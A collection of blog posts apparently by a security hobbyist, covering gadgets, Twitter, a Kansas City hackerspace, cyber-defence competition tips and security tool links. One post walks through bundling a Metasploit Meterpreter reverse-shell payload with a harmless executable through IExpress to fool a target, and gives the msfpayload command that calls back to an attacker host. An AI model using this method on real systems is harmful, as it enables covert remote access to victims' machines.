Recently I have been debating on whether to get a Netbook or the Kindle 2. (I am only in this debate because my lovely wife decided to buy a table and chairs, for the house. There is no winning when they buy things for ‘the house’ or ‘the kids’).

Anyways, I tweeted up my dilemma and got a huge amount of responses. They came from both sides of the fence. Some said Kindle and some said Netbook, and they all had good arguments. But, being the gadget nerd that I am and having owned a netbook before I started to lean towards the Kindle. Until I looked at the Kindle store..

When you hear about the Kindle you hear about the cheap books (no argument there), the free EVDO (still no argument), and the fact that you can read blogs and magazines. This is where the marketing people caught me. I am a huge blog reader. I currently have 2700+ blogs in my google reader OPML (I can usually hit them all in less than an hour with a process I’ve refined, so don’t think too lowly of me). So the fact that I could read my blogs and the occasional book, and even send pdfs to the Kindle got me excited about the product.

I put the Kindle 2 in my shopping cart at Amazon, added a leather case just for S&G, and looked back at TweetDeck for any last comments people had. @hmjgriffon was completely against buying the Kindle, so I decided to try out sending a PDF to the Kindle app Amazon has for the iPhone. I had installed it a couple nights ago and hadn’t tested it.

This is where the charges started rolling in. First I find out that it is 10 cents per PDF that I have converted for use on the Kindle/iPhone App. Then I looked into the blogs, you know, just to try at least SOMETHING out before I bought it. The few blogs that they support are either 99 cents or 1.99 a month. Wait.. so let me get this straight. I have to pay $1 or $2 to view a blog that is free? No thanks. I mean they could do something cool and special with the blog, but I don’t see the market. Magazines, maybe, I think I would probably subscribe to CPU or Linux Journal if it came via Kindle (definitely 2600..).

So, I stopped, and complained on twitter about it. Then a couple people started shouting solutions, and @wardspan pointed me towards a Kindle book (and said it contained the secret to using Google Reader on the Kindle free):

The Complete User’s Guide To the Amazing Amazon Kindle 2: A Kindle Owners Toolkit Of Over 500 Tips, Tricks, & Links (For Amazons Revolutionary e-Book Reader & Free Wireless Web Browser) (Kindle Edition)

I decided to purchase it (0.99) and read it on my iPhone, for not only the contents of the book, but to kind of gauge the service for myself before I buy. I think that 99 cents is a minimal cost to find out if the Kindle truly is for me.

Hope this helps those of you who are on the fence like me.

Most of you Twitterholics have seen this beautiful status. You get a total of 100 API calls per Twitter account per hour. What happens if you use all of your afforded calls? You can just use http://www.twitter.com/ no problem right? Well you loose a lot of what makes Twitter clients so useful (search, grouping, instant updates.. etc).

Well, what if you leave you client up at home? TweetDeck by itself uses most of the API calls just by itself. So in this scenerio, you are destined (at least for that day) to spend it on the twitter site, which as we already discussed, leaves much to be desired.

Mom taught me never to point out a problem without suggeting a solution, so here is what I think would be an awesome addition to Twitter, that might have other advantages as well:

This is at the bottom of gmail. It allows you to see where else your account is being accessed from (IP). You can also click “Details” and click to log out of all other sessions. This would be nice in twitter for a couple reasons. It would allow you to block/logout the client you left at home, but also check to make sure the IPs that are accessing the API on your behalf are your own.

Just a suggestion..

Hiding Meterpreter with IExpress from mubix on Vimeo.

Using the IExpress, a built in tool (XP, not sure about other Windows versions), we package two executables together, so that the target is less likely to suspect foul play. Now, I used calc.exe, but you can use anything on both sides of the coin. Use a better game so that it’s easyier to dupe, or a different malicious executable (leekspin perhaps?).

I’ll let your minds take this to the level I know you all are capable of. One caveat is that the icon for the executable is that of the self extractor, which shouldn’t be that much of an issue to change, but I don’t know off the top of my head of an app that does it, so please comment and let me know if you do.

Commands from video:

• ./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.0.100 LPORT=1080 X > /tmp/academy/bob.exe
• (For python 2.4+) python -m SimpleHTTPServer
• (For python 2.3 –) python -c “from SimpleHTTPServer import test; test()”
• Start –> Run –> iexpress
• Run multi/hander from command line (not shown in video)

Links from video:

• http://www.metasploit.com/
• http://www.shell-fu.org/
• http://www.microsoft.com/technet/prodtechnol/ie/ieak/techinfo/deploy/60/en/iexpress.mspx?mfr=true
• http://www.virustotal.com/
• http://www.theacademypro.com/
• http://www.theacademyhome.com/

Official Press Release: 

February 24th, 2009.  Kansas City, MO – The Cowtown Computer Congress (CCCKC) is happy to announce the opening of their Underground Lab to the public with a full week of events  Beginning on March 2nd, the grand opening showcase the rich and vibrant community of creative minds in the Kansas City area.   CCCKC, the first organization of its kind in the midwest, will serve the community by providing technology classes, donating unique projects to local organizations and technology assistance to those in need.

The week will kick off on Monday, March 2nd with an open house for individuals and organizations who are interested in learning more about the organization and how they can take advantage the Underground Lab for meetings, classes and other activities.

The creative talents of CCCKC members will be showcased on Wednesday March, 4th.  The member project showcase will be followed by a screening of Make:TV, a public television series which will be shown for the first time in the Kansas City area that night.  If you’re curious about what CCCKC and the maker culture are all about, this is the night to come be inspired.  Projects to be showcased range from alternative methods of energy generation to a labyrinth game which is controlled with the balance board from a Nintendo Wii Fit.

Thursday, March 5th is the regular member meeting where members come together to discuss group projects being developed for donation to local organizations and plan future community service projects like our monthly free computer repair opportunities.

Friday evening will feature a slate of speakers covering topics ranging from improving home security and information management to protecting data from theft while using public wireless internet.

On Saturday the public is invited to take part in a range of free workshops on basic electronics and soldering, e-textiles and Nintendo Wii hacking.  All day members will be available to assist members of the public choose, install and configure computers using the free and open source Linux operating system.

About The Cowtown Computer Congress

The Cowtown Computer Congress (CCCKC) is a not for profit technology cooperative founded to advance technology of all kinds.  They are a member supported organization providing technology classes, workshops and services to the public free of charge.  CCCKC brings together some of the finest minds in midwest to collaborate on research and projects for other local groups.  Through their affiliate program, CCCKC gives assistance to specialized technology user groups by providing them with a facility to hold meetings and work on projects of their own.

CCCKC’s Underground Lab is located 85 feet below the surface of the earth at 31st Street and Southwest Trafficway in Kansas City, Missouri.

http://www.cowtowncomputercongress.org Further inquires should be made to:
press@cowtowncomputercongress.org or to
John Benson – President and Co-Founder
816-332-6389

So if you live in Kansas City or surrounding area, please go check out CCCKC. If you live in Washington D.C. or surrounding areas also check out http://www.hacdc.org/ and for all other locations around the world, check out http://www.hackerspaces.org/

(This is the 3rd time I am writing this post, FF Fail, then Word crashed, so please excuse the lack of passion)

The moment that PDANet published that they released an updated version that allows USB tethering, I ran home and “QuickPWNd” my phone (which took all 5 minutes). Loaded the app and now I had the coveted TETHERING. I was free of my bind to Comcast or Free Public Wifi. However, over the next few months, my iPhone started getting slower and slower to respond. Crashes happened on apps that never had a problem before (including Safari). It would even crash on incoming calls.

5 minutes ago (now more like 20), I had it crash again and slow responsiveness down to unbearable speeds. (2 minutes from touch to fully started app). When I had an internal debate: Would I go home and de-PWN it, or deal with it? With that same thought I realized that at the core of most of the technologies we use today, Windows, Twitter, MySpace (now Facebook), is an underlying need, freedom, or other feature that they provide that makes them ‘bearable’.

Twitter’s FAIL WHALE is famous because Twitter crashes or is down A LOT. Why do you still use it? Windows is an utter mess of code and BSOD even had a hardware device made for it. Why do you still use it? …you get the point.

I’m not going to revert my iPhone back. You know why? Because the freedom that it provides me, (like typing a blog post for the 3rd time going 65 miles an hour in the back seat of a car) is worth it, to me.

Let me start off this post by saying that the main focus of any of these competitions is not to win, but to learn. Learning is usually accompanied by tears on the defenders side, but the best way to learn is to fail.

That said though, the title of this post is about how to win:

Planning Phase:

This is where you win or lose. If you don’t have a good plan and a good team layout ahead of time, you are screwed. We (the ‘red cell’) will walk all over the fact that you can’t get your team organized and execute.

1. Know your infrastructure: Assign people not only to the different parts, but to also learn those parts BEFORE go time. Practice.

2. Team Organization: This means that you are going need assigned team leads. For instance this is how you can have it laid out for a 5 person team and what their roles would do.

   1. Team Lead: This person needs to lead. Duh right? Well there is more to it; they need to know each of the other roles on a generic technical level. They also have to be to go-to person, any calls that come in as ‘business injects’, emails, whatever, they need to be the one to deal with it. They also need to be up to date with what each person is doing and keeping them on task. They should not be on a keyboard unless they are really needed to be (i.e. supporting lunch switch outs, or responding via email to a biz inject)

   2. Patch / Software Retrieval / Software Installation: This is the gopher. He / She needs to know the best and fastest ways to download patches and software that will be needed. And how to get them to install quicker or in the background. Generating a list of links and posting them somewhere online so that you can just go to that page and click down the list will help extremely, especially if you aren’t allowed to take anything into the competition (i.e. USB drives). (google: ctupdate4). The list should include direct links to patches, av, known good software that each team member will need, etc other. And possibly bundle it up so that it is just that much faster to pull down. Use a download manager to pull it down (DownThemAll w/ FireFox). Every second you waste on waiting for software is more time for a ‘red cell’ member to entrench themselves.

   3. Incident Responder: At first this person may not be busy, but needs to know incident response inside and out. How to check for network connections, and rouge processes. Needs to have a list of services that run on a Windows 2000, XP and 2003 box. This would also be the keeper of the password list and the person to make the call when passwords need to be changed. But more on that later. Know TCPView, Autoruns, and Procexp like the back of your hand, and rename the executables so that when the red cell looks for you running monitoring tools they won’t be able to differentiate.

   4. Infrastructure / Linux Guru: This person needs to know Cisco and Linux. Know how to set passwords for the interfaces, vty, console, aux and so on. Know how to encrypt those passwords. Know how to turn off unneeded ports (nudge nudge). Have a print out of commands to do all these things as well as ACL manipulation (deny any/any is a great place to start, then build upon what you need to allow out and in). Know how to manually reset passwords in Cisco switches, routers, pix, and Linux machines (single user mode).

   5. Monitoring: General administration and monitoring is the main focus for this one. As soon as there is any sign of compromise, they inform the Incident Responder and continue to monitor the other systems. This person needs as much visual real-estate as possible they need to have all kinds of monitoring (process, network and services) tools up and running. Also, they need to be scanning the network constantly (AutoScan’s Intrusion Alert is your friend) for any ‘new’ IP addresses that show up. Watch for ARP spoofing (google: DecaffeinatID)

3. Have a password policy: Do not use the same password on all of your systems. A lot of teams do this for speed and team dynamics but you can keep both if you circulate that password policy around your team and it is well known. For example. Your active directory domain controllers could have an admin password of “$tupid Active Directory Pa$$word”, changing only the middle part of the pass phrase for whatever system you are dealing with. Then when you encounter something that is a bit more constrained, like a router, switch or firewall, you can easily concatenate it to be something like “$tupidrtrPa$$word”. This is where knowing your infrastructure helps. Have a password sheet on a printed (not digital). Keep it in a folder, and keep it closed unless you have someone forget the password for some reason. Have at least 3 iterations of this sheet with a different password structure for each one. Make scheduled changes of all the passwords. If there is 3 days to the competition, have it change twice a day, once in the morning and once in the afternoon. Doing this will not only keep those system passwords from being static targets, it will also give you an idea of what is compromised that you might not have seen (i.e. you can’t change the password because it was already changed for you)

4. Firewalls: Almost all systems these days have host based firewalls (Windows Firewall / Linux IPTABLES). Learn them, find out how to turn them on and configure them with a default deny rule set.

5. Have a plan: Generate a generic plan of attack and each night discuss and plan the next day’s defense.

Execution Phase:

Do what you planned, and stick to it. Plan for Armageddon and hope for cake. Once you have done all of the basics that you can plan for, then all you have to worry about are your public facing services (Web, FTP etc.)

1. Web Applications: These are on the for-front of today’s security watch list. The reason? Because they HAVE to be accessible. How do you fight / protect it? Log review. Now in an actual live site, it would be difficult to impossible to really watch logs effectively. However in the dynamic sites these days where files on the server don’t change, just the database, it would behoove you to put something like tripwire (linux or windows) to watch the files in the web directory for changes. If a file gets added to that directory you know that it needs to be investigated. Don’t stop the investigation at deleting the file either, look through the logs, find out how it got there and close up the hole.

2. FTP: Set up your FTP server to log attempts to login. Open the logs with tail -f (linux) or BareTail (windows) and watch it. If you see someone trying to brute-force login or someone logging in that shouldn’t be, start investigating.

3. Other: It basically falls back to the basics with all services. Watch the logs for anomalies.

That’s really it folks. Have you been on either side? Comment and let others know how they can better prepare.

So here is the deal. I have a ticket to the RSA Conference that is April 20-24 in San Francisco, at Moscone Center. I can’t use it. So I am offering it up as a bribe. Here is the bribe. I need a video of The Middler in action. From start (downloading) to finish (compromise / root / BeEF / owange) of another machine.

The video must be without audio, pausing a bit with each step, and a maximum of 1020 x 720 in resolution preferably in Camtasia Studio format. And no, Jay, it can’t be the one you used at ShmooCon. This video will be added to The Academy Pro site through the normal cycle. Submit your videos via link, or attachment to rob [at] theacademy d0t ca or twitter @mubix 

If you are a vendor / conference organizer and would like to offer the same deal for whatever kind of video you would like (as long as it fits the M.O. of The Academy Pro / Home) please contact me at rob [at] theacademy d0t ca.

Direct Link to The Middler download: http://inguardians.com/tools/middler-alpha.tgz

I got this off of a post by Jason Appelbaum and I thought it important to repost. We all need to remember where we came from once in a while.

History of the Internet from Melih Bilgil on Vimeo.

It figures that someone who didn’t go actually made a list of tools. (Probably because they didn’t have to suffer the ShmooFlu)

Check out: http://blog.security4all.be/2009/02/shmoocon-2009-overview-collection-of.html 

Thanks to Security4all for posting it up!

If you see something that he doesn’t have, pictures, videos, links, or tools, please let him know.

FireTalks / PodCasters Meetup audio can be found here soon: http://pcm.libsyn.com/

The official link is up and here it is.. well, until they release the beta:

http://inguardians.com/tools/middler-alpha.tgz

 Keep up with http://www.inguardians.com/ for all of their great tools.